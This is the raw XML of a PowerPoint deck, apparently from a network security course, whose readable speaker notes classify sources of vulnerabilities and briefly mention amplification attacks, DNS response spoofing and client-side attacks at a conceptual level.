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 id="2147483779" r:id="rId2"/>
    <p:sldMasterId id="2147483791" r:id="rId3"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId101"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId4"/>
    <p:sldId id="387" r:id="rId5"/>
    <p:sldId id="282" r:id="rId6"/>
    <p:sldId id="334" r:id="rId7"/>
    <p:sldId id="386" r:id="rId8"/>
    <p:sldId id="385" r:id="rId9"/>
    <p:sldId id="371" r:id="rId10"/>
    <p:sldId id="271" r:id="rId11"/>
    <p:sldId id="272" r:id="rId12"/>
    <p:sldId id="273" r:id="rId13"/>
    <p:sldId id="274" r:id="rId14"/>
    <p:sldId id="275" r:id="rId15"/>
    <p:sldId id="276" r:id="rId16"/>
    <p:sldId id="277" r:id="rId17"/>
    <p:sldId id="278" r:id="rId18"/>
    <p:sldId id="279" r:id="rId19"/>
    <p:sldId id="280" r:id="rId20"/>
    <p:sldId id="281" r:id="rId21"/>
    <p:sldId id="284" r:id="rId22"/>
    <p:sldId id="285" r:id="rId23"/>
    <p:sldId id="370"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381" r:id="rId37"/>
    <p:sldId id="382" r:id="rId38"/>
    <p:sldId id="383" r:id="rId39"/>
    <p:sldId id="384" r:id="rId40"/>
    <p:sldId id="299" r:id="rId41"/>
    <p:sldId id="380" r:id="rId42"/>
    <p:sldId id="300" r:id="rId43"/>
    <p:sldId id="301" r:id="rId44"/>
    <p:sldId id="302" r:id="rId45"/>
    <p:sldId id="303" r:id="rId46"/>
    <p:sldId id="304" r:id="rId47"/>
    <p:sldId id="305" r:id="rId48"/>
    <p:sldId id="306" r:id="rId49"/>
    <p:sldId id="372" r:id="rId50"/>
    <p:sldId id="374" r:id="rId51"/>
    <p:sldId id="375" r:id="rId52"/>
    <p:sldId id="376" r:id="rId53"/>
    <p:sldId id="377" r:id="rId54"/>
    <p:sldId id="373" r:id="rId55"/>
    <p:sldId id="283" r:id="rId56"/>
    <p:sldId id="258" r:id="rId57"/>
    <p:sldId id="259" r:id="rId58"/>
    <p:sldId id="260" r:id="rId59"/>
    <p:sldId id="262" r:id="rId60"/>
    <p:sldId id="261" r:id="rId61"/>
    <p:sldId id="263" r:id="rId62"/>
    <p:sldId id="264" r:id="rId63"/>
    <p:sldId id="336" r:id="rId64"/>
    <p:sldId id="265" r:id="rId65"/>
    <p:sldId id="266" r:id="rId66"/>
    <p:sldId id="268" r:id="rId67"/>
    <p:sldId id="310" r:id="rId68"/>
    <p:sldId id="312" r:id="rId69"/>
    <p:sldId id="337" r:id="rId70"/>
    <p:sldId id="338" r:id="rId71"/>
    <p:sldId id="313" r:id="rId72"/>
    <p:sldId id="339" r:id="rId73"/>
    <p:sldId id="340" r:id="rId74"/>
    <p:sldId id="343" r:id="rId75"/>
    <p:sldId id="344" r:id="rId76"/>
    <p:sldId id="345" r:id="rId77"/>
    <p:sldId id="346" r:id="rId78"/>
    <p:sldId id="347" r:id="rId79"/>
    <p:sldId id="348" r:id="rId80"/>
    <p:sldId id="349" r:id="rId81"/>
    <p:sldId id="350" r:id="rId82"/>
    <p:sldId id="351" r:id="rId83"/>
    <p:sldId id="352" r:id="rId84"/>
    <p:sldId id="353" r:id="rId85"/>
    <p:sldId id="354" r:id="rId86"/>
    <p:sldId id="341" r:id="rId87"/>
    <p:sldId id="342" r:id="rId88"/>
    <p:sldId id="355" r:id="rId89"/>
    <p:sldId id="356" r:id="rId90"/>
    <p:sldId id="357" r:id="rId91"/>
    <p:sldId id="358" r:id="rId92"/>
    <p:sldId id="359" r:id="rId93"/>
    <p:sldId id="360" r:id="rId94"/>
    <p:sldId id="361" r:id="rId95"/>
    <p:sldId id="362" r:id="rId96"/>
    <p:sldId id="363" r:id="rId97"/>
    <p:sldId id="364" r:id="rId98"/>
    <p:sldId id="365" r:id="rId99"/>
    <p:sldId id="333" r:id="rId100"/>
  </p:sldIdLst>
  <p:sldSz cx="13004800" cy="9753600"/>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mn-cs"/>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mn-cs"/>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mn-cs"/>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mn-cs"/>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57" autoAdjust="0"/>
    <p:restoredTop sz="94984" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="68" d="100"/>
          <a:sy n="68" d="100"/>
        </p:scale>
        <p:origin x="1544" y="200"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="3072"/>
        <p:guide pos="4096"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="66" d="100"/>
        <a:sy n="66" d="100"/>
      </p:scale>
      <p:origin x="0" y="88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presProps" Target="pres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ヒラギノ角ゴ ProN W3" charset="-128"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W3"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E80A91F2-723E-44AD-99CB-7D61D3D9804A}" type="datetime1">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/16/19</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ヒラギノ角ゴ ProN W3" charset="-128"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W3"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9D13B3A9-5BD6-408C-A5F7-33C883C0D00B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53565445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itchFamily="34"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a:lnSpc>
                <a:spcPts val="1766"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="981"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Standards - look at RFC1771 which allows an ASN of 0 but excluded by IANA. Some routers allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> an ASN of zero to be input. Is it passed along? What problems does it cause?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1766"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="981"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requirements -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Security protection and detection is often missing in requirements and “bolted on” later – if done at all.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Architecture vulnerabilities are inherent vulnerabilities in the design of an application. Attackers can exploit them by using standard functionality in a malicious way. Without proper measures, attackers can use functionality in ways never envisioned by developers. You cannot fix the vulnerabilities with proper input validation as with most security vulnerabilities that exist on the Internet today. Architecture vulnerabilities require that you design security into the application from the beginning.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Design vulnerabilities are inherent to a protocol specification, present even in perfect implementations. A specification using weak cryptography has a design vulnerability. In this case, the design vulnerability contains weak cryptography as a member of its’ characteristic set. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1766"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="981"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementation - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In contrast, implementation vulnerabilities are specific to a single instance of a protocol. This could be either a hardware or software flaw. A buffer overflow in an operating system’s IP stack demonstrates a software implementation vulnerability. A faulty switch port demonstrates a hardware implementation vulnerability. The overflow and the faulty port are both members of a characteristic set belonging to the implementation vulnerability.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1766"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="981"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configuration – How</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the options of the ]network and applications are configured.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1766"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="981"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operations – Security breaches here are very often characterized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> as human failure or “pilot error”. Maybe we should look at this as the failure of technology to account for human behavior i.e. too many account, too many passwords, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1766"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="981"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>People – People are inherently</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> trusting.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1766"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="981"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Mindset – there are security devices (FW, IDS, IPS, etc)  and there are functional devices (application, computers, etc). In reality, non-security devices are detectors of security events and can be used to correlate and filter those events.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{06469B18-D0A4-4B7A-B7C3-E6AF9798CA07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2723190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t>NTP Amplification conceptually same as DNS Amplification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11162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lgn="l" eaLnBrk="0" hangingPunct="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lgn="l" eaLnBrk="0" hangingPunct="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lgn="l" eaLnBrk="0" hangingPunct="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lgn="l" eaLnBrk="0" hangingPunct="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lgn="r" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{404244C2-FA81-4605-A8A7-D1E791D3F94E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans" charset="0"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3" charset="-128"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans" charset="0"/>
              <a:ea typeface="ヒラギノ角ゴ ProN W3" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1406446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p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11469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tLang="en-US"/>
              <a:t>Client accepts first correct response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114692" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6E9F52C2-6A40-4CD3-A069-45226157FA14}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3937407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p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1157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tLang="en-US"/>
              <a:t>Client side attacks have become the norm in the past few years</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115716" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{37757370-82B6-4579-94D7-DEC0FDDA8F7C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3735208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p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11673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Currently has 55 thousand plugins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116740" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0BB5FBB4-52CA-475C-9B90-DE811B7A8B48}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4102184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bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4C08ECE4-AC9A-44A7-84BE-6DAD70615148}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177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776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lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4267976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bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04178582-5A8B-439A-8284-C7F0C8435EB6}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1187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8788"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291879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bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EA83F1A4-C7C2-4EFE-B190-6119552D4428}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1198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9812"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2408738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a:lnSpc>
                <a:spcPts val="1766"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="981"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Standards - look at RFC1771 which allows an ASN of 0 but excluded by IANA. Some routers allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> an ASN of zero to be input. Is it passed along? What problems does it cause?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1766"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="981"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requirements -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Security protection and detection is often missing in requirements and “bolted on” later – if done at all.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Architecture vulnerabilities are inherent vulnerabilities in the design of an application. Attackers can exploit them by using standard functionality in a malicious way. Without proper measures, attackers can use functionality in ways never envisioned by developers. You cannot fix the vulnerabilities with proper input validation as with most security vulnerabilities that exist on the Internet today. Architecture vulnerabilities require that you design security into the application from the beginning.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Design vulnerabilities are inherent to a protocol specification, present even in perfect implementations. A specification using weak cryptography has a design vulnerability. In this case, the design vulnerability contains weak cryptography as a member of its’ characteristic set. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1766"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="981"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementation - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In contrast, implementation vulnerabilities are specific to a single instance of a protocol. This could be either a hardware or software flaw. A buffer overflow in an operating system’s IP stack demonstrates a software implementation vulnerability. A faulty switch port demonstrates a hardware implementation vulnerability. The overflow and the faulty port are both members of a characteristic set belonging to the implementation vulnerability.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1766"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="981"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configuration – How</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the options of the ]network and applications are configured.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1766"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="981"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operations – Security breaches here are very often characterized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> as human failure or “pilot error”. Maybe we should look at this as the failure of technology to account for human behavior i.e. too many account, too many passwords, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1766"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="981"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>People – People are inherently</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> trusting.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1766"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="981"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Mindset – there are security devices (FW, IDS, IPS, etc)  and there are functional devices (application, computers, etc). In reality, non-security devices are detectors of security events and can be used to correlate and filter those events.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{06469B18-D0A4-4B7A-B7C3-E6AF9798CA07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1248366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p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1075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tLang="en-US"/>
              <a:t>Lookback address. Should be blocked locally and on the network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107524" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{915D95D6-CCF8-4AD5-88D7-9BD225D10385}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4123461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p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
